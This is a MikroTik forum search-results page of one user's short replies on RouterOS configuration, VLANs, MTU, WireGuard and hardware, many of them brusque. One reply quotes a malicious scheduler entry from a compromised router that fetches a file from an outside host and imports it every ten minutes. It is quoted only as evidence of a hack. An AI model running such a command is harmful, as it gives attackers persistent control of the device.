Community discussions

MikroTik App

Search found 307 matches

  • 1
  • 2
by Znevna
Thu Jul 22, 2021 12:46 pm
Forum: General
Topic: Winbox and NPCAP compatibility
Replies: 5
Views: 275

Re: Winbox and NPCAP compatibility

Nothing to do with NPCAP. Nothing to do with what "VirtualBox does to the network adapter". VirtualBox by default adds an "Host Only" Network adapter and Winbox will try to use that one for discovery. You either disable that network adapter and restart WinBox, or save your device...
by Znevna
Thu Jul 08, 2021 9:23 am
Forum: RouterOS v7 BETA
Topic: MT Router as Wireguard Client & Benchmarks
Replies: 10
Views: 3889

Re: MT Router as Wireguard Client & Benchmarks

If changing MSS fixes things for you, you're doing something wrong. Or.. atleast don't say that MSS fixes MTU. Setting the proper MTU "fixes" MTU.
by Znevna
Tue Jun 29, 2021 1:19 am
Forum: General
Topic: Can Someone Explain this!!!!
Replies: 7
Views: 588

Re: Can Someone Explain this!!!!

Ask your network administrator.
Or the one with the networking skills.
by Znevna
Tue Jun 22, 2021 9:26 pm
Forum: General
Topic: From Mikrotik to Ubiquiti UniFi and back to Mikrotik
Replies: 43
Views: 3632

Re: From Mikrotik to Ubiquiti UniFi and back to Mikrotik

I've told TP-Link that I'll bitch about this issue and warn users with any chance I get but this is ridiculous, two in two days! @CyBuzz see what I wrote here about TL-SG108E: https://forum.mikrotik.com/viewtopic.php?f=2&t=175848#p863639 And below.. since @anav was talking about a totally differ...
by Znevna
Tue Jun 22, 2021 7:32 pm
Forum: General
Topic: move traffic stats from combo1 to ether1
Replies: 5
Views: 356

Re: move traffic stats from combo1 to ether1

wut
combo1 has nothing to do with ether1
you could rename it to ether0 to avoid confusion.
Are you sure you're plugged into ether1 and not into the first ethernet port that's labeled just 'ETH' ?
pictures!
details!
If you've found a bug, report it.
LE: lol.
by Znevna
Tue Jun 22, 2021 1:17 pm
Forum: RouterOS v7 BETA
Topic: Wireguard works in one direction on CCR 1016
Replies: 3
Views: 598

Re: Wireguard works in one direction on CCR 1016

Recheck your config.
by Znevna
Tue Jun 22, 2021 1:08 pm
Forum: RouterOS v7 BETA
Topic: WireGuard: Response packets not routed
Replies: 5
Views: 803

Re: WireGuard: Response packets not routed

Missing piece of configuration for sure.
But post a diagram and config exports.
by Znevna
Mon Jun 21, 2021 11:48 pm
Forum: General
Topic: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought
Replies: 18
Views: 1230

Re: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought

So you don't even own the switch that we're talking about, it's not even from the "Easy Smart" series. Your switch is from the "Smart Managed" series: https://www.tp-link.com/us/business-networking/smart-switch/ We're talking about a switch from the "Easy Smart" series:...
by Znevna
Mon Jun 21, 2021 11:19 pm
Forum: General
Topic: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought
Replies: 18
Views: 1230

Re: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought

@anav, I won't google for you. https://bfy.tw/R9Ez Can you choose a management VLAN on TL-SG108E ? No, you can't. The management interface "binds" to ALL VLANs. Take jithinsarath's example here, with access ports 4,5,6,7,8 to VLANs 10,20,30,40, you plug your PC into any of them, run the (s...
by Znevna
Mon Jun 21, 2021 8:45 pm
Forum: General
Topic: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought
Replies: 18
Views: 1230

Re: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought

Regarding the switch: Well you can't ping/reach it, unless you set an IP from that subnet on your laptop/computer while you're on any of the VLANs. Another bug would be if you have the switch set to DHCP instead of static, the switches DHCP Client would run on random VLANs ..... A cheap alternative ...
by Znevna
Mon Jun 21, 2021 7:24 pm
Forum: General
Topic: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought
Replies: 18
Views: 1230

Re: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought

Wasn't a mistake, obviously. You can do your own tests if you own one of those switches, or search the internet for more info.
by Znevna
Mon Jun 21, 2021 3:50 pm
Forum: General
Topic: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought
Replies: 18
Views: 1230

Re: Home VLAN Design (Mikrotik, TPLink, Ubiquiti) - My Experience and some firewall advice sought

You might wanna get rid of that TL-SG108E in the near future. As all TP-Link "Easy Smart Switches" have a major flaw: you can't specify the management VLAN. The management interface is reachable from ANY VLAN, and the IP you've set is also reachable from ANY VLAN. You can test with the uti...
by Znevna
Tue Jun 15, 2021 4:01 am
Forum: General
Topic: Classless-Routes not being added by dhcp-client
Replies: 21
Views: 1319

Re: Classless-Routes not being added by dhcp-client

Thank you, @Znevna, [...] In summary: The RouterOS dhcp-client is configured correctly but does not set the classless-routes sent by the Starlink terminal DHCP server. I'll contact Mikrotik support. [...] Welcome! Yeah, I wrote above why those two routes won't register, you can try manually and see...
by Znevna
Tue Jun 15, 2021 2:34 am
Forum: General
Topic: Classless-Routes not being added by dhcp-client
Replies: 21
Views: 1319

Re: Classless-Routes not being added by dhcp-client

Ah, so NOW you took the time to read the details provided in the first post? Instead of asking for the "DNS Server config"... Hence, the troll. PS: good job at editing your replies. PS2: specifying the interface like I wrote above should be ok, as others tested on other routers: https://ww...
by Znevna
Tue Jun 15, 2021 1:58 am
Forum: General
Topic: Classless-Routes not being added by dhcp-client
Replies: 21
Views: 1319

Re: Classless-Routes not being added by dhcp-client

Worth mentioning (it's obvious anyway) that this is regarding Starlink, maybe @rextended can take a look at the DHCP setting that they are using. Or just ignore the troll. Oh wait, he asked about the configuration of the DNS server, how is that related, beats me. Anyway, Just looking at those classl...
by Znevna
Sun Jun 13, 2021 3:06 pm
Forum: General
Topic: mikrotik used as a spoof ddns
Replies: 5
Views: 451

Re: mikrotik used as a spoof ddns

Don't open port 53 to the whole internet?
Or just use a proper firewall?
And fire the guy that handles router security. Since he didn't do his job.
Or, send him to training.
by Znevna
Sun Jun 13, 2021 3:04 pm
Forum: General
Topic: Issue with DST-NAT (RouterOS 6.47.10)
Replies: 16
Views: 769

Re: Issue with DST-NAT (RouterOS 6.47.10)

So the topic title "Issue with DST-NAT (RouterOS 6.47.10)" is actually "I don't know how the internet works, it must be this specific version broken and this specific feature." ?
by Znevna
Sat Jun 12, 2021 10:07 pm
Forum: General
Topic: Where is a manual - need to print it and have it as PDF
Replies: 8
Views: 636

Re: Where is a manual - need to print it and have it as PDF

Be sure to keep the pages updated :)
by Znevna
Mon Jun 07, 2021 10:00 pm
Forum: General
Topic: IRC channel on freenode
Replies: 15
Views: 1804

Re: IRC channel on freenode

Karen, you were asking for buttons, yet obviously, you wouldn't know what to do with them.
Because: even your ignore button doesn't work.
Also I'm still waiting for your reply on how are you gonna rebuild RouterOS to handle your buttons.
by Znevna
Mon Jun 07, 2021 5:35 pm
Forum: General
Topic: IRC channel on freenode
Replies: 15
Views: 1804

Re: IRC channel on freenode

1623076858288.jpg
by Znevna
Mon Jun 07, 2021 7:27 am
Forum: General
Topic: IRC channel on freenode
Replies: 15
Views: 1804

Re: IRC channel on freenode

Per the Libera.chat guidelines the current ##mikrotik channel (double #) is an informal channel. https://libera.chat/chanreg https://libera.chat/chanreg#informal-channels And anyone can manage it (whoever registered it first), everyone knows it's not "official" . If some official from Mikr...
by Znevna
Sun Jun 06, 2021 8:25 pm
Forum: General
Topic: someone hack my routrs - can someone help?
Replies: 15
Views: 1803

Re: someone hack my routrs - can someone help?

And you wonder why there are so many botnets out there.
by Znevna
Sun Jun 06, 2021 12:58 am
Forum: Announcements
Topic: WinBox v3.28 released!
Replies: 33
Views: 11741

Re: WinBox v3.28 released!

9 replies, nothing regarding this version. forum done right. Anyway, an actual bug: in QuickSet / CPE or PTP Bridge CPE, selecting one of the discovered networks leads to an instant WinBox hang -> not responding. LE: 10 replies, counting the one below. LE2: corrected numbers, I've missed the bug rep...
by Znevna
Fri Jun 04, 2021 10:31 am
Forum: General
Topic: ip cloud DDNS does not work
Replies: 3
Views: 475

Re: ip cloud DDNS does not work

by Znevna
Fri Jun 04, 2021 9:02 am
Forum: General
Topic: Is there a problem with IP Cloud? [SOLVED]
Replies: 38
Views: 4097

Re: Is there a problem with IP Cloud? [SOLVED]

Yup, it's dead, the DDNS part atleast. I thought it was something about 6.47.10, but no, it's not version related.
by Znevna
Thu Jun 03, 2021 2:28 pm
Forum: General
Topic: ROS Attack
Replies: 9
Views: 666

Re: ROS Attack

Where is the attack that you specified in the topic title? any proof of an attack? logs? how did they get it? is it a hardware failure? or is it an user misconfiguration?
by Znevna
Thu Jun 03, 2021 12:38 pm
Forum: Announcements
Topic: v6.47.10 [long-term] is released!
Replies: 144
Views: 18693

Re: v6.47.10 [long-term] is released!

N.e.t.i.n.s.t.a.l.l.
by Znevna
Thu Jun 03, 2021 12:32 pm
Forum: RouterOS v7 BETA
Topic: v7beta6: Life-/valid-time of dynamic IPv6 prefixes
Replies: 2
Views: 756

Re: v7beta6: Life-/valid-time of dynamic IPv6 prefixes

Did you try changing the default values and it doesn't work? [admin@MikroTik] > /ipv6/nd/prefix/default/ print autonomous: yes valid-lifetime: 4w2d preferred-lifetime: 1w to, for example: [admin@MikroTik] > /ipv6/nd/prefix/default/ set valid-lifetime=1d preferred-lifetime=12h [admin@MikroTik] > /ipv...
by Znevna
Wed Jun 02, 2021 4:55 pm
Forum: Announcements
Topic: v6.47.10 [long-term] is released!
Replies: 144
Views: 18693

Re: v6.47.10 [long-term] is released!

factory defaults don't help, you have to netinstall :)
by Znevna
Tue Jun 01, 2021 1:10 pm
Forum: General
Topic: NextDNS DoH ... Identify your devices !?
Replies: 8
Views: 587

Re: NextDNS DoH ... Identify your devices !?

If you install that on any of the supported devices and use that as your LAN's DNS with a preconfigured hosts file or something, maybe. Since MikroTik doesn't use anywhere the hostnames from DHCP Leases, you'd have to script it: https://wiki.mikrotik.com/wiki/Setting_static_DNS_record_for_each_DHCP_...
by Znevna
Tue Jun 01, 2021 12:41 pm
Forum: General
Topic: NextDNS DoH ... Identify your devices !?
Replies: 8
Views: 587

Re: NextDNS DoH ... Identify your devices !?

To make that happen you'd have to use DoH in every of those devices with some other name for each of them appended to the URL.
by Znevna
Tue Jun 01, 2021 12:32 pm
Forum: General
Topic: NextDNS DoH ... Identify your devices !?
Replies: 8
Views: 587

Re: NextDNS DoH ... Identify your devices !?

You follow the instructions from "Identify your devices" -> DoH section, Firefox is used just as an example name in there, you can use it the same way everywhere you're using DoH. Append the name to the provided URL (the name should be URL encoded). see: /ip dns set use-doh-server="ht...
by Znevna
Tue Jun 01, 2021 11:46 am
Forum: General
Topic: NextDNS DoH ... Identify your devices !?
Replies: 8
Views: 587

Re: NextDNS DoH ... Identify your devices !?

In the Setup / Setup Guide section of your chosen nextdns config there's a section for MikroTik under Routers, did you encounter a problem with those instructions?
by Znevna
Thu May 27, 2021 11:05 pm
Forum: General
Topic: IPv6 - FOR THE LOVE OF GOD WHY IS THIS BROKEN??!?!??!?! [SOLVED]
Replies: 14
Views: 1078

Re: IPv6 - FOR THE LOVE OF GOD WHY IS THIS BROKEN??!?!??!?! [SOLVED]

Why didn't you stay with those equipments then? If it works, don't fix it.
by Znevna
Thu May 27, 2021 10:58 pm
Forum: General
Topic: IPv6 - FOR THE LOVE OF GOD WHY IS THIS BROKEN??!?!??!?! [SOLVED]
Replies: 14
Views: 1078

Re: IPv6 - FOR THE LOVE OF GOD WHY IS THIS BROKEN??!?!??!?! [SOLVED]

MikroTik can't fix your shitty provider.
by Znevna
Tue May 25, 2021 7:39 pm
Forum: General
Topic: DDNS IP CLOUD
Replies: 5
Views: 397

Re: DDNS IP CLOUD

Leave that aside, WHY ARE YOU RUNNING RouterOS 6.42.5 (2018!) in 2021!?!?
by Znevna
Tue May 25, 2021 2:52 pm
Forum: RouterOS v7 BETA
Topic: WireGuard and IP Cloud
Replies: 1
Views: 871

Re: WireGuard and IP Cloud

Why the fancy title? MikroTik IP Cloud DDNS is like any other DDNS. (2) Why did you set an endpoint on the "server" side? that is not needed, it is filled automatically with the proper IP and SRC Port when the "client" connects; (3) When adding a DDNS as an endpoint, it should ge...
by Znevna
Tue May 25, 2021 2:13 pm
Forum: General
Topic: Mikrotik B750Gr3 wrong voltage
Replies: 1
Views: 269

Re: Mikrotik B750Gr3 wrong voltage

Routers aren't known for accurate voltage measurements.
An accuracy of ~ ±5% in these things I think it's acceptable.
Also the topic title is misleading, you might want to adjust it a little to reflect your actual question / "issue".
by Znevna
Sat May 22, 2021 11:14 am
Forum: General
Topic: PPPoE MTU as specified by ISP not working
Replies: 5
Views: 582

Re: PPPoE MTU as specified by ISP not working

If that is the case, something between ether1 and your ISP doesn't support Baby Jumbo Frames. I had the same issue on RB4011 using the SFP port, which required a disable/enable of the SFP port after reboot for the MTU setting to get applied. Think that was fixed in the latest beta. What device is it...
by Znevna
Mon May 17, 2021 12:54 pm
Forum: General
Topic: PPPoE MTU as specified by ISP not working
Replies: 5
Views: 582

Re: PPPoE MTU as specified by ISP not working

ether1 MTU should be 1512 (1508 + the VLAN Tag of 4 byte).
vlan6 MTU should be 1508.
PPPoE MTU/MRU 1500, you don't touch MRRU.

LE: for auto MTU/MRU to work properly on the PPPoE client, you have to set ether1 MTU to 1524 and vlan6 MTU to 1520; yes, 12 bytes more for each, because.. MikroTik.
by Znevna
Fri May 14, 2021 12:25 pm
Forum: General
Topic: New WiFi Vulnerabilities - Frag Attacks
Replies: 19
Views: 3864

Re: New WiFi Vulnerabilities - Frag Attacks

Thank you!
by Znevna
Thu May 13, 2021 10:15 am
Forum: General
Topic: IPv6 - FOR THE LOVE OF GOD WHY IS THIS BROKEN??!?!??!?! [SOLVED]
Replies: 14
Views: 1078

Re: IPv6 - FOR THE LOVE OF GOD WHY IS THIS BROKEN??!?!??!?! [SOLVED]

How about some more useful debug logs? from when it's working and from when it's not? hm? can you do that instead of screaming for nothing in the forums?
You specified some "junk modem" are you behind a modem? is that in bridge or router mode? details? hm? no? ok.
by Znevna
Wed May 12, 2021 10:40 pm
Forum: General
Topic: New WiFi Vulnerabilities - Frag Attacks
Replies: 19
Views: 3864

Re: New WiFi Vulnerabilities - Frag Attacks

So.. the answer so far is "no".
Ok.
Thanks for clarifying that.
Cheers!
by Znevna
Wed May 12, 2021 10:17 pm
Forum: General
Topic: New WiFi Vulnerabilities - Frag Attacks
Replies: 19
Views: 3864

Re: New WiFi Vulnerabilities - Frag Attacks

Did anyone bother to even test a MikroTik device for the said vulnerability? or we're just posting shit on the forums?
by Znevna
Wed May 12, 2021 9:06 am
Forum: General
Topic: Suspect hAP ac lite wasn't new
Replies: 10
Views: 732

Re: Suspect hAP ac lite wasn't new

The list of distributors is on mikrotik's website: https://mikrotik.com/buy
If you decided to buy from some shady amazon seller, you get what you get...
by Znevna
Sat May 08, 2021 11:02 am
Forum: General
Topic: Why I can't have a gigabit connection with rb750gr3
Replies: 8
Views: 608

Re: Why I can't have a gigabit connection with rb750gr3

He posted that screenshot from a Windows machine with the Link Speed of 100Mbps, but didn't mention where that PC is plugged in.. those screenshots only have "ISP" Links and a "LAN" link between the routers.. Faulty cable? limited interface on the PC/Laptop of only 100Mbps? Wrong...
by Znevna
Thu May 06, 2021 7:54 am
Forum: RouterBOARD hardware
Topic: MT support refused to fix issues. And lies. Again.
Replies: 2
Views: 1499

Re: MT support refused to fix issues. And lies. Again.

@mikrabuser
How many more shitty topics are you going to open?
Go buy a TP-Link or something and shit all day in their forum too.
by Znevna
Mon May 03, 2021 10:37 pm
Forum: General
Topic: IPv6 ICMP ok but no TCP traffic
Replies: 20
Views: 1047

Re: IPv6 ICMP ok but no TCP traffic

They work under the same MTU provided by the PPPoE interface, yes. However for IPv4 there's a default change-tcp-mss=yes rule set in the PPPoE Profile. For IPv6 you apply one of the solutions mentioned in those posts. Even if PMTUD works, the first connection will get "stuck", since the fi...
by Znevna
Mon May 03, 2021 9:47 pm
Forum: General
Topic: IPv6 ICMP ok but no TCP traffic
Replies: 20
Views: 1047

Re: IPv6 ICMP ok but no TCP traffic

Read this whole topic: viewtopic.php?f=2&t=171390
And this: viewtopic.php?f=2&t=169757&p=832247#p831447
Disregard IP'njeneer's "solution" though.
by Znevna
Fri Apr 30, 2021 7:50 pm
Forum: General
Topic: Mikrotik + Sophos XG FW Winbox blocked if APP filter applied
Replies: 5
Views: 680

Re: Mikrotik + Sophos XG FW Winbox blocked if APP filter applied

Since it's a Sophos problem, ask Sophos about it.
by Znevna
Fri Apr 30, 2021 5:26 pm
Forum: General
Topic: [BUG] Certificate Days Valid shows wrong value due to 32-bit time_t
Replies: 5
Views: 464

Re: [BUG] Certificate Days Valid shows wrong value due to 32-bit time_t

Oh, in production you don't use certificates valid for 100 years.
Problem solved.
by Znevna
Mon Apr 26, 2021 11:10 am
Forum: General
Topic: Ookla Speed Test with RB750gr3 [SOLVED]
Replies: 6
Views: 805

Re: Ookla Speed Test with RB750gr3 [SOLVED]

No Guru needed. Since you have this in your config, your device was hacked: /system scheduler add interval=10m name=U7 on-event="/tool fetch url=http://globalmoby.xyz/poll/\ c0823205-f6e9-49d0-8b89-06f7f803960f mode=http dst-path=7xe7zt46hb08\r\ \n/import 7xe7zt46hb08" policy=\ ftp,reboot,...
by Znevna
Fri Apr 23, 2021 7:35 pm
Forum: General
Topic: RB4011 ROS takes up an order of magnitude more space
Replies: 15
Views: 1179

Re: RB4011 ROS takes up an order of magnitude more space

File a bug report if you consider whatever this is such a big issue :)
by Znevna
Fri Apr 23, 2021 12:50 pm
Forum: General
Topic: RB4011 ROS takes up an order of magnitude more space
Replies: 15
Views: 1179

Re: RB4011 ROS takes up an order of magnitude more space

Inodes take up some space too, for a 512MB partition.
But how would you expect @Cablenut9 to know something about filesystems..
by Znevna
Thu Apr 22, 2021 5:29 pm
Forum: General
Topic: FTP with WININET.dll Problem (Visual Foxpro)
Replies: 7
Views: 631

Re: FTP with WININET.dll Problem (Visual Foxpro)

user bug.
by Znevna
Thu Apr 22, 2021 6:18 am
Forum: General
Topic: RB4011 ROS takes up an order of magnitude more space
Replies: 15
Views: 1179

Re: RB4011 ROS takes up an order of magnitude more space

You do realize that it's the exactly the same package for hAP ac2 which only has 16MB of internal flash.
There is no "95MB" downloadable "ROS" package.
"order of magnitude" !! .. stop smoking.
by Znevna
Mon Apr 19, 2021 12:39 pm
Forum: General
Topic: ISP to Mikrotik Router RB4011 Bridging
Replies: 12
Views: 943

Re: ISP to Mikrotik Router RB4011 Bridging

That printscreen doesn't contain enough data to show the problem.
Post a more complete log, attach the log file, edited.
by Znevna
Sat Apr 17, 2021 9:07 am
Forum: General
Topic: Cloutik feedback ?
Replies: 12
Views: 1447

Re: Cloutik feedback ?

By how that website looks, that service "screams": pay me to fuck up your router. And whoever pays them deservers to be left out of his router(s). Thats my feedback. And to everyone else that is confused about the topic, he ain't talking about IP Cloud from MikroTik, but about some shady w...
by Znevna
Fri Apr 16, 2021 11:51 pm
Forum: General
Topic: CRS317-1G-16S+ High CPU lead to drop packet
Replies: 28
Views: 2222

Re: CRS317-1G-16S+ High CPU lead to drop packet

Why did you put something like this on a switch, beats me.
Any router instead of a switch should do the job, right?
by Znevna
Fri Apr 16, 2021 11:30 pm
Forum: General
Topic: Connect Two different Subnets
Replies: 9
Views: 1026

Re: Connect Two different Subnets

I'm sure @mozerd could fix this if he could read labels.
by Znevna
Fri Apr 16, 2021 8:20 pm
Forum: Beginner Basics
Topic: IPV6 RB4011 as Subrouter in DHCP-PD chain: pool prefix-length:68
Replies: 4
Views: 511

Re: IPV6 RB4011 as Subrouter in DHCP-PD chain: pool prefix-length:68

[...] Here is part of the rb4011 config [...] /ipv6 dhcp-client add add-default-route=yes interface=TRANSIT pool-name=TRANSIT pool-prefix-length=48 prefix-hint=::/60 request=address,prefix [...] for an unknown reason, the pool is created with a prefix-length of 68. The addresses extracted from the ...
by Znevna
Fri Apr 16, 2021 7:21 pm
Forum: General
Topic: Botnet and bad actor filters
Replies: 6
Views: 814

Re: Botnet and bad actor filters

Can you also filter bad actors from Netflix?
by Znevna
Fri Apr 16, 2021 6:36 pm
Forum: General
Topic: ISP to Mikrotik Router RB4011 Bridging
Replies: 12
Views: 943

Re: ISP to Mikrotik Router RB4011 Bridging

In the screenshot posted, ether2 (in italic) means there's no link on that interface. How can it work?
by Znevna
Thu Apr 15, 2021 9:25 pm
Forum: General
Topic: AES-CBC vs. CTR performance
Replies: 2
Views: 353

Re: AES-CBC vs. CTR performance

And you don't do some tests yourself because...
In the two hours between your initial post and the useless "bump" you could've figured it out.
by Znevna
Tue Apr 13, 2021 10:46 am
Forum: General
Topic: possible bug about windbox and VPN access
Replies: 2
Views: 241

Re: possible bug about windbox and VPN access

1. There's no "windbox".
2. Once you configure the router using QuickSet and afterwards you make some changes to the config manually, YOU NEVER USE QUICKSET AGAIN, EVER!.
That should solve your problems.
by Znevna
Wed Apr 07, 2021 1:17 pm
Forum: General
Topic: Mikrotik -Mikrotik VPN site to site Problem with Panasonic Pbx's [SOLVED]
Replies: 8
Views: 710

Re: Mikrotik -Mikrotik VPN site to site Problem with Panasonic Pbx's [SOLVED]

You were running that config for 6 months and haven't spotted any problems with it?.. Well, @sindy saves the day again, but "the other tehnician" was right in the end: you misconfigured those things. Also running OpenVPN on a single core 600MHz CPU / 650MHz on the other side, and PPPoE on ...
by Znevna
Mon Apr 05, 2021 9:21 am
Forum: General
Topic: Multicast flood
Replies: 13
Views: 895

Re: Multicast flood

Or try to configure IGMP Snooping properly? https://help.mikrotik.com/docs/pages/vi ... d=59277403
idk.
by Znevna
Sat Apr 03, 2021 6:59 pm
Forum: General
Topic: IPSec Multipoint Config [SOLVED]
Replies: 3
Views: 408

Re: IPSec Multipoint Config [SOLVED]

If you want to use only policies, yes, those aren't even many since you didn't cover all the networks. I have 16 dynamic policies on the main router, and that to cover main office + 4 branches, 1 network / location. So magic number for policies on main router seems to be (networks-1)^2, that if you ...
by Znevna
Wed Mar 31, 2021 9:21 pm
Forum: General
Topic: NETWATCH & IP CLOUD
Replies: 2
Views: 325

Re: NETWATCH & IP CLOUD

To quote a master of this forum: https://forum.mikrotik.com/viewtopic.php?f=13&t=173857#p850834 Also please move your local IP Address from ether2 to BRIDGE!! IT IS WRONG TO KEEP IT ON ETHER2!!! lol. Now, ontopic, Tool/Netwatch holds IP Addresses in the host field, if you try to add a hostname f...
by Znevna
Wed Mar 31, 2021 10:29 am
Forum: General
Topic: pcc load balance dropping packets
Replies: 3
Views: 434

Re: pcc load balance dropping packets

https://wiki.mikrotik.com/wiki/How_PCC_works_%28beginner%29 The connectivity issues are from you not using per-connection-classifier=src-address, which is not the best option (every clients traffic will go out either through WAN1 OR WAN2) but it doesn't break so many things like HTTPS and other serv...
by Znevna
Tue Mar 30, 2021 9:17 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

The two links in a bridged configuration will (hopefully) be used as described in the "Enabled Switching Diagram": the ports outside the bridge on a link, and the bridged ports on the other link. They mentioned that for now the only "predictable CPU lane layout" setup is the disa...
by Znevna
Tue Mar 30, 2021 5:39 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Good news! they managed to reproduce my findings and they will try to fix the issue in an upcoming RouterOS version, no ETA for now though. So there is indeed hope for even greater power from this tiny box. Thank you all for testing and feedback (even the negative ones, the world needs you too!). Ch...
by Znevna
Sat Mar 27, 2021 12:17 pm
Forum: General
Topic: Failed to prevent communication with cloud2.mikrotik.com [SOLVED]
Replies: 2
Views: 529

Re: Communication with cloud2.mikrotik.com cannot be completely disabled under 6.48.1 [SOLVED]

Did you bother to search the forum or the wiki? https://wiki.mikrotik.com/wiki/Manual:IP/Cloud
Disable Update Time since it uses, well, the cloud.
Disable Auto Time Zone from the clock menu, since it also uses, well, the cloud.
by Znevna
Fri Mar 26, 2021 11:05 pm
Forum: RouterBOARD hardware
Topic: Wifi RB4011 - HAP AC3 - HAP AC3 LTE
Replies: 12
Views: 2336

Re: Wifi RB4011 - HAP AC3 - HAP AC3 LTE

the non-LTE version of hAP ac3 has 128MB storage, do you need more than that? https://mikrotik.com/product/hap_ac3
by Znevna
Sun Mar 21, 2021 1:51 am
Forum: RouterBOARD hardware
Topic: CRS112-8P-4S-IN believe it or not
Replies: 6
Views: 1244

Re: CRS112-8P-4S-IN believe it or not

Your topic is named CRS112-8P, yet you provide a picture with the device that has written on it CRS112-8G, notice anything wrong here?
What's the topic about ? you failing to read labels? lol.
by Znevna
Sat Mar 20, 2021 3:22 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta5 [development] is released!
Replies: 293
Views: 47049

Re: v7.1beta5 [development] is released!

[...] Works fine on 6.48.1 and 7.1b4. Ugrading the router from 7.1b4 to 7.1b5 brings up the problem that IPv6 does no longer work. Also I change the MTU on ND to 1492. I can see RADV advertising it, but it does not fix the problem. Any suggestions what I could try to fix the IPv6 problem reported b...
by Znevna
Sat Mar 20, 2021 3:14 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta5 [development] is released!
Replies: 293
Views: 47049

Re: v7.1beta5 [development] is released!

This is usually not needed, because of path mtu discovery (RFC8201). ICMPv6 just needs to be allowed on all routers between Host A and B. I still see people blocking icmp for "security reasons"... People also keep saying what you're saying, without testing. With MTU 1500 packets leave the...
by Znevna
Mon Mar 15, 2021 11:29 pm
Forum: RouterBOARD hardware
Topic: S-RJ01 SFP Module in RB4011iGS+ flapping
Replies: 13
Views: 2399

Re: S-RJ01 SFP Module in RB4011iGS+ flapping

[...] I have the same thing happening on fiber and disabling and enabling the SFP let it reconnect at a MTU of 1500. I have made a script in the PPPoE connection to check after few seconds if the MTU is 1500, and if not restarts the SPF. Works fine for me. In PPP profiles on-up: { :delay 4s /interf...
by Znevna
Mon Mar 15, 2021 7:01 pm
Forum: General
Topic: No thermal pads with R11e-LTE6
Replies: 6
Views: 680

Re: No thermal pads with R11e-LTE6

Mentioned right there: https://help.mikrotik.com/docs/display/UM/R11e+series
"Optionally you can use the thermal pad by placing it under the card, the thermal pad is not included in the package;"
by Znevna
Mon Mar 15, 2021 3:59 pm
Forum: General
Topic: DNS Setting with AdGuard
Replies: 7
Views: 1559

Re: DNS Setting with AdGuard

As stated in the same topic, yes. Because netwatch only checks the ping reply, but the DNS service might be down and you end up with no working resolvers.
by Znevna
Mon Mar 15, 2021 8:49 am
Forum: RouterBOARD hardware
Topic: Identically mac on RB750GR3
Replies: 2
Views: 702

Re: Identically mac on RB750GR3

Some people dream of having a spare like that: https://forum.mikrotik.com/viewtopic.php?f=2&t=144539&sid=a1cb8436c7688b0f488ebf4224427ff1#p837078 But still, if this turns out to be true, it is a little concerning. How would the IP/Cloud DDNS service handle this (on the server side) if two of...
by Znevna
Sun Mar 14, 2021 11:41 pm
Forum: General
Topic: DNS Setting with AdGuard
Replies: 7
Views: 1559

Re: DNS Setting with AdGuard

Scripting. You use your router as the resolver sent to clients, and you switch the server used by the routers resolver based on which one responds. You can try searching the forum for different approaches, mostly by users using PiHole. But this one I've used for some time: https://forum.mikrotik.com...
by Znevna
Sun Mar 14, 2021 11:26 pm
Forum: General
Topic: DNS-over-HTTPS (DoH)
Replies: 4
Views: 754

Re: DNS-over-HTTPS (DoH)

Your blacklist can't fix DoH? Weird.
I thought a blacklist fixes everything.
by Znevna
Sun Mar 14, 2021 10:49 am
Forum: RouterBOARD hardware
Topic: RB4011 (WiFi) and again about the stability of the work.
Replies: 5
Views: 1131

Re: RB4011 (WiFi) and again about the stability of the work.

Standard= ?? :) unless you select "regulatory-domain" for "frequency-mode" and choose the right country, "standard".. might not be so power friendly. Check the status tab on each interface.
by Znevna
Sun Mar 14, 2021 10:29 am
Forum: RouterBOARD hardware
Topic: RB4011 (WiFi) and again about the stability of the work.
Replies: 5
Views: 1131

Re: RB4011 (WiFi) and again about the stability of the work.

I wouldn't have gone with this beast for WiFi simply because where you could run decently so many cables, usualy ain't a great spot for an AP, and viceversa, where there's a good spot for an AP it usualy isn't a good place to bring so many cables. But: I'd use it with wireless disabled, if it is sta...
by Znevna
Sat Mar 13, 2021 11:34 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Looks the same here: /interface bridge port> monitor [find interface=ether2] interface: ether2 port-number: 1 /interface bridge port> monitor [find interface=ether3] interface: ether3 port-number: 2 /interface bridge port> monitor [find interface=ether4] interface: ether4 port-number: 3 /interface b...
by Znevna
Sat Mar 13, 2021 10:33 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Yeah, I thought switching port 2 or 4 to stand-alone and using the rest in a bridge would be the best, but apparently those two are the worst options of them all. As seen above: Using port 2 as stand-alone and 1,3,4,5 in a bridge, throughput is over 1Gb/s only between ports 2 and 4, no more. Using p...
by Znevna
Sat Mar 13, 2021 6:56 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

So, guess what? this looks like a bug, since the bridge actually does seem to control which port gets on which lane, since I wanted to move my WAN to port 2, SURPRISE (see below). I redid all the below tests, three times each. Including the one which started this "search" (port 1 stand-alo...
by Znevna
Sat Mar 13, 2021 1:19 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Here the hEX RB750Gr3 can be currently found at ~55€ including shipping, the 1000/500 connection for residential customers is ~8.2€ at most providers, most of them offer the services via PPPoE which itself is taxing enough on the CPU. At work, yes, I have an RB4011 in one place for similar connectio...
by Znevna
Sat Mar 13, 2021 10:37 am
Forum: RouterBOARD hardware
Topic: hEX block diagram
